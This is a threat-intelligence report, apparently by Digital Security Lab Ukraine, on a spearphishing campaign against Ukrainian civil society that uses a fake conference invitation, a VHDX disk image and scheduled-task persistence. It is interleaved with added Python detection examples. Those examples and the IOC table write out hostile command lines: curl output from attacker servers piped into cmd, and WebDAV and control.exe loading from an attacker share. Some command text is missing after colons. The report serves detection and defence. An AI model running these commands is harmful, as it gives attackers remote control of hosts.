Digital Security Lab Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of Ukrainian civil society organizations (CSOs) and initiatives, as well as government officials.
Among the targets are Ukrainian advocacy platforms, journalists, and economists engaged in analytical, communications, and advocacy work on security, Euro-Atlantic integration, the confiscation of Russian assets, accountability for Russian war crimes and Ukraine’s post-war recovery.
Starting on June 10, 2026, threat actors used emails impersonating Paweł Kowal – a Polish politician, Chairman of the EU-Ukraine Parliamentary Cooperation Committee (Wikipedia). He is a highly recognizable figure when it comes to issues related to Ukraine’s recovery, as well as the organization of high-level meetings.
Initial Access: a fake conference invitation
The emails came from a Proton Mail account, “[email protected]”, signed “Pavlo Koval, Ukraine Recovery Conference.” Some parts of the email text reveal that it was translated from Russian. The message invited the recipient to the Ukraine Recovery Conference – a real event that runs every year. This time, the event is scheduled to take place in Gdańsk, Poland.
The real conference sends invitations from “[email protected]”, and its website is https://urc-international[.]com. Neither was involved here. The attackers impersonated the names, titles, and logos of the official event. [Screenshot of the official conference page]
Delivery on request
The first email had no attachment. It referred to a registration form “in the attached file,” but nothing was attached. The file appeared only after a recipient replied and asked for it. A message with no payload passes mail scanning cleanly, and the loader only reaches people who have already shown they are engaged. It also keeps the sample away from anyone who never replies.
The follow-up email carried the archive, and the body of that reply included an image showing the password to open it. 
Weaponized archive: evasion via Disk Image
The attached file, “URC_2026_Official_Invitation.zip”, is a password-protected ZIP. The password is delivered as an image styled to look like a CAPTCHA.
The ZIP holds one file: “Files.vhdx”, a Virtual Hard Disk (v2). A VHDX behaves like a physical hard drive but exists as a single file. This choice matters. Files opened from a mounted disk image do not carry the “downloaded from the internet” mark that Windows normally attaches, so the usual SmartScreen warning never appears.
Extracting the image exposes three partitions:
0. Microsoft reserved partition.img
1. Basic data partition.fat → holds “URC_2026_Official_Invitation.lnk”
2. Basic data partition.ntfs → (volume label “SecureVault”) → holds the decoy “URC_2026_Official_Invitation.pdf” and a file named “do” containing a script.
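The disk-image trick above is worth catching before the user ever mounts anything. The following is an added example, not DSLU tooling: a mail-gateway triage routine that lists the entries of a ZIP and flags disk-image containers. It relies on two facts: entry names in a ZIP are stored in clear even when the contents are password-protected, so the presence of a .vhdx can be flagged without the password, and a VHDX file begins with the signature "vhdxfile" at offset 0, so a readable entry can be confirmed by format rather than by name. The sample archive is constructed in memory; the entry name Files.vhdx comes from the report, everything else is this example's own assumption.

```python
"""Mail-gateway triage for archives that carry a mountable disk image.

Added example, not DSLU tooling. The archive is constructed in memory; only
the entry name Files.vhdx is taken from the report.
"""
import io
import zipfile

# Containers Windows mounts as a drive. Files opened from a mounted image do
# not carry the Mark-of-the-Web, which is the bypass the report describes.
DISK_IMAGE_EXTENSIONS = (".vhdx", ".vhd", ".iso", ".img")

# First eight bytes of a VHDX file (its File Type Identifier).
VHDX_MAGIC = b"vhdxfile"


def triage_zip(data: bytes) -> dict:
    """Inspect a ZIP given as raw bytes and return findings plus a verdict.

    Entry names live in the central directory and are never encrypted by
    classic ZIP password protection, so a disk image can be flagged even
    when the password is unknown; the magic check needs a readable entry.
    """
    findings = {"encrypted": False, "disk_images": [], "vhdx_confirmed": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            entry_encrypted = bool(info.flag_bits & 0x1)  # bit 0: encrypted entry
            if entry_encrypted:
                findings["encrypted"] = True
            if info.filename.lower().endswith(DISK_IMAGE_EXTENSIONS):
                findings["disk_images"].append(info.filename)
                if not entry_encrypted:
                    with zf.open(info) as fh:
                        if fh.read(len(VHDX_MAGIC)) == VHDX_MAGIC:
                            findings["vhdx_confirmed"].append(info.filename)
    findings["verdict"] = "block" if findings["disk_images"] else "allow"
    return findings


def build_sample_zip(with_image: bool = True) -> bytes:
    """Constructed sample: a ZIP with a harmless text file and, optionally,
    a stub that starts with the VHDX signature (header bytes only, no real image)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "nothing to see")
        if with_image:
            zf.writestr("Files.vhdx", VHDX_MAGIC + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
    print(triage_zip(build_sample_zip(with_image=False)))
```

Because the archive in the campaign was password-protected, a real gateway would take the first branch only: the name check fires, the magic check is skipped, and the message is held on the name alone, which is exactly why listing entries without extracting them matters.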
Execution – the Loader chain
“URC_2026_Official_Invitation.lnk” looks like a document, with a PDF icon. It launches PowerShell. The trick is that the shortcut stores its own script in the Description field, and the command line reads that field and executes it:
The Description locates the mounted “SecureVault” volume and pipes the “do” script into cmd:
The “do” opens the decoy PDF so the victim sees something plausible, then quietly fetches its next command from a remote server:

The request carries the victim’s domain, computer name, and username inside the URL, with the user-agent “WindowsUpdatesMonitor”. Whatever the server returns is piped straight into cmd and runs. Nothing is saved as a file – it executes in memory.
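The callback format just described is a network-side detection opportunity. The following is an added example, not part of DSLU's report: it scans constructed proxy-log lines for the two user-agents listed in the IOC table and recovers the victim fingerprint from both URL shapes the report gives, the plain `us=%userdomain%_%computername%_%username%` form used here and the base64 `DOMAIN\HOST\USER` form used by the persistence tasks described below. The domain, the two addresses and the user-agents are the report's IOCs; the log line layout, client addresses, timestamps and the identity CORP\WS01\alice are this example's own constructions.

```python
"""Proxy-log detection for the callback pattern in the report.

Added example, not DSLU tooling. Log lines are constructed; the user-agents,
secure-dns-hub.com and 103.160.59.97 come from the report's IOC table, the
victim identity CORP\\WS01\\alice and the line layout are invented.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

SUSPICIOUS_USER_AGENTS = {"WindowsUpdatesMonitor", "DNSObserver"}

# DOMAIN\HOST\USER: three non-empty tokens separated by backslashes.
FINGERPRINT_RE = re.compile(r"^[^\\]+\\[^\\]+\\[^\\]+$")

# Assumed line layout: <timestamp> <client-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample log. The ui= value is the base64 form the persistence
# tasks use; it is computed here rather than pasted so it is guaranteed valid.
_ENCODED = base64.b64encode(b"CORP\\WS01\\alice").decode()
SAMPLE_LOG = f"""\
2026-06-12T09:14:03Z 10.0.0.25 GET https://103.160.59.97/miles/windows?us=CORP_WS01_alice "WindowsUpdatesMonitor"
2026-06-12T09:14:09Z 10.0.0.25 GET http://secure-dns-hub.com/dns/request?ui={_ENCODED} "DNSObserver"
2026-06-12T09:15:00Z 10.0.0.31 GET https://www.example.org/index.html "Mozilla/5.0"
"""


def decode_fingerprint(url: str):
    """Return 'DOMAIN\\HOST\\USER' if the URL carries either fingerprint form, else None."""
    qs = parse_qs(urlsplit(url).query)
    if "us" in qs:
        # Plain form DOMAIN_HOST_USER. A name containing '_' makes the split
        # ambiguous, so accept exactly three non-empty parts only.
        parts = qs["us"][0].split("_")
        if len(parts) == 3 and all(parts):
            return "\\".join(parts)
    if "ui" in qs:
        # Base64 form. parse_qs turns '+' into ' ', so restore it before decoding.
        raw = qs["ui"][0].replace(" ", "+")
        try:
            text = base64.b64decode(raw, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None
        if FINGERPRINT_RE.match(text):
            return text
    return None


def scan_proxy_log(text: str):
    """Return one alert per line that uses a known user-agent or carries a fingerprint."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, ua = m.groups()
        reasons = []
        if ua in SUSPICIOUS_USER_AGENTS:
            reasons.append(f"user-agent {ua}")
        fingerprint = decode_fingerprint(url)
        if fingerprint:
            reasons.append(f"victim fingerprint {fingerprint}")
        if reasons:
            alerts.append({"ts": ts, "client": client, "url": url,
                           "fingerprint": fingerprint, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert)
```

The decoded fingerprint is the useful part of the alert: it names the compromised host and account directly, so the responder knows which machine to isolate without first resolving the proxy client address.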
Persistence
The next stage establishes persistence. The base64-encoded PowerShell script registers four scheduled tasks, each on a short timer between 7 and 15 minutes. Together they keep the host calling back to the attacker’s infrastructure over HTTP and WebDAV. Every call sends the same victim fingerprint – domain, hostname, and username joined as `DOMAIN\HOST\USER` encoded as Base64.
Task “SecureDNSObserver” fetches a response from the attacker’s server every ten minutes and pipes it straight into “cmd.exe”. That is an open command channel where the operator can run whatever they want on the host for as long as the task survives.
The other three tasks rely on WebDAV for delivery. “net use \\microsoft[.]com\DavWWWRoot” starts the Windows WebClient service – the “DavWWWRoot” keyword forces WebDAV over HTTP instead of SMB, and a legitimate Microsoft host is used only to wake the service.
With the client running, the two “control.exe” tasks load a resource from the attacker’s WebDAV share at “89[.]125[.]66[.]183”. “control.exe” is a legitimate Windows Control Panel process. WebDAV exposes those remote files as ordinary-looking file paths through the WebClient service, so “control.exe” – normally a loader for Control Panel applets, which are DLLs – loads attacker code from the remote share as if it were local.
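Each step of this persistence chain leaves a distinct host artefact: an encoded PowerShell command line, a scheduled task with a short repeat interval, a `net use` to a DavWWWRoot path, `control.exe` launched with a UNC path, and curl output piped into cmd. The following is an added example, not DSLU tooling, of rules over constructed process-creation and task-creation records in the shape a Sysmon event 1 or Security log 4688/4698 feed would give; the field names are this example's own. The task name SecureDNSObserver, the user-agents, the DavWWWRoot wake-up and the 89.125.66.183 share are from the report; `<resource>` and `<base64>` are placeholders for values the report does not give, and CORP_WS01_alice is an invented identity.

```python
"""Host-telemetry rules for the persistence chain in the report.

Added example, not DSLU tooling. Records are constructed in a generic
process-creation / task-creation shape; field names are this example's own.
SecureDNSObserver, the user-agents, DavWWWRoot and 89.125.66.183 are from the
report; <resource> and <base64> are placeholders.
"""
import base64
import re

SUSPICIOUS_USER_AGENTS = ("windowsupdatesmonitor", "dnsobserver")
SHORT_TIMER_MINUTES = 15  # the report's tasks fire every 7 to 15 minutes

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; longest alternative first.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
INTERPRETER_RE = re.compile(r"\b(?:cmd|powershell|curl|control)(?:\.exe)?\b", re.I)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(record: dict):
    """Return the names of the rules a single record triggers."""
    hits = []
    if record.get("event") == "TaskCreated":
        # Short repeat timer whose action runs an interpreter or downloader.
        if (record.get("interval_minutes", 10**9) <= SHORT_TIMER_MINUTES
                and INTERPRETER_RE.search(record.get("action", ""))):
            hits.append("short_timer_task_with_interpreter")
        return hits

    image = record.get("image", "").lower()
    cmd = record.get("cmdline", "")
    low = cmd.lower()
    # 'net use \\host\DavWWWRoot' starts the WebClient service (WebDAV over HTTP).
    if image.endswith("net.exe") and "davwwwroot" in low:
        hits.append("webdav_client_wakeup")
    # control.exe given a UNC path loads a Control Panel applet (a DLL) from a remote share.
    if image.endswith("control.exe") and "\\\\" in cmd:
        hits.append("control_panel_applet_from_unc_path")
    if "curl" in low and any(ua in low for ua in SUSPICIOUS_USER_AGENTS):
        hits.append("curl_known_bad_user_agent")
    # Server response piped straight into cmd: an open command channel.
    if image.endswith("cmd.exe") and "curl" in low and re.search(r"\|\s*cmd(?:\.exe)?\b", low):
        hits.append("curl_output_piped_to_cmd")
    if image.endswith("powershell.exe"):
        script = decode_encoded_command(cmd)
        if script and re.search(r"register-scheduledtask|schtasks", script, re.I):
            hits.append("encoded_powershell_registers_task")
    return hits


def sample_records():
    """Constructed records mirroring the chain; the last two are benign controls."""
    task_script = 'Register-ScheduledTask -TaskName "SecureDNSObserver" -Trigger $t -Action $a'
    enc = base64.b64encode(task_script.encode("utf-16-le")).decode()
    return [
        {"event": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": f"powershell.exe -nop -w hidden -enc {enc}"},
        {"event": "TaskCreated", "task_name": "SecureDNSObserver", "interval_minutes": 10,
         "action": "cmd.exe /c curl http://secure-dns-hub.com/dns/request?ui=<base64> -A DNSObserver | cmd.exe"},
        {"event": "ProcessCreate", "image": r"C:\Windows\System32\net.exe",
         "cmdline": r"net use \\microsoft.com\DavWWWRoot"},
        {"event": "ProcessCreate", "image": r"C:\Windows\System32\control.exe",
         "cmdline": r"control.exe \\89.125.66.183\DavWWWRoot\<resource>"},
        {"event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
         "cmdline": 'cmd.exe /c "curl https://103.160.59.97/miles/windows?us=CORP_WS01_alice -A WindowsUpdatesMonitor | cmd"'},
        {"event": "ProcessCreate", "image": r"C:\Windows\System32\control.exe", "cmdline": "control.exe"},
        {"event": "TaskCreated", "task_name": "Backup", "interval_minutes": 1440, "action": "backup.exe /full"},
    ]


if __name__ == "__main__":
    for rec in sample_records():
        print(rec.get("task_name") or rec["image"], "->", evaluate(rec))
```

None of these rules depends on the final payload, which the report could not retrieve: they key on the legitimate Windows components the chain abuses (WebClient, control.exe, the task scheduler) being driven in ways ordinary software does not drive them, so they keep working when the operator changes the code on the share.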
We were unable to retrieve the next payload from the WebDAV share at “89[.]125[.]66[.]183”. The payload it ultimately installs is still unknown and the investigation continues.
Conclusions
This campaign is based on methods that we have repeatedly documented as being used against Ukrainian civil society, linked together in a single chain. Posing as a trusted institution or public figure, hiding the payload in a password-protected archive, and using a Windows shortcut (.lnk) to launch the infection chain – these are all recurring patterns in DSLU’s phishing investigations.
Several elements stand out compared to our previous cases. The first is selective delivery. The initial email contains no malicious attachment; the malicious file is sent only to those who reply. This prevents mass scanning of the sample and avoids detection among those who never interact with the email, making it harder to detect the campaign based on email alone. The second is delivery within a virtual hard disk (VHDX) image, which allows the attackers to bypass Windows built-in protections. The third is selective execution. The final malicious code was not automatically downloaded and executed on all of the victims’ devices.
This practical lesson aligns with our previous conclusions: you cannot rely solely on traditional antivirus software or default protection against this type of attack, since nothing in the chain is a typical virus. Protection comes from behavior – being cautious about invitations from personal email accounts or unofficial channels, never opening password-protected archives, and establishing response procedures for suspicious activity. The targeting remains consistent: individuals and organizations working on security, recovery and support for Ukraine remain the primary focus.
IOCs (Indicators of Compromise):
| Indicator | Value |
| --- | --- |
| URC_2026_Official_Invitation.zip | 99f971a9256dff777dce7c4165b794f9cedbc0e62426351ad31ff6dcb09cf7cd |
| Files.vhdx | 831ef80ba20a69ec20009a33bf39b266932d5d0f85bd761d9fdb1c071cb0e7ee |
| URC_2026_Official_Invitation.lnk | c0004f96f305ae93dd4067c6637c8f4edafb122d4bf4cad7b7e42084a3aa1408 |
| ProtectedFiles/do | 480b5f762a9f8c2a2fe64eb21d27f237a02d6afd9b46fa13a9259bdff9c7e104 |
| Decoy PDF URC_2026_Official_Invitation.pdf | 61f9d54a0808aceeed8a6229252f0d3381df929b97f8f613d6a037290e7b0598 |
| Remote command source | 103[.]160[.]59[.]97 |
| Remote command source | 89[.]125[.]66[.]183 |
| Remote command source | secure-dns-hub[.]com |
| curl User-Agent | WindowsUpdatesMonitor |
| curl User-Agent | DNSObserver |
| URL Template | hxxps://103[.]160[.]59[.]97/miles/windows?us=%userdomain%_%computername%_%username% |
| URL Template | hxxp://secure-dns-hub[.]com/dns/request?ui=$encodedValue -A DNSObserver \| cmd.exe |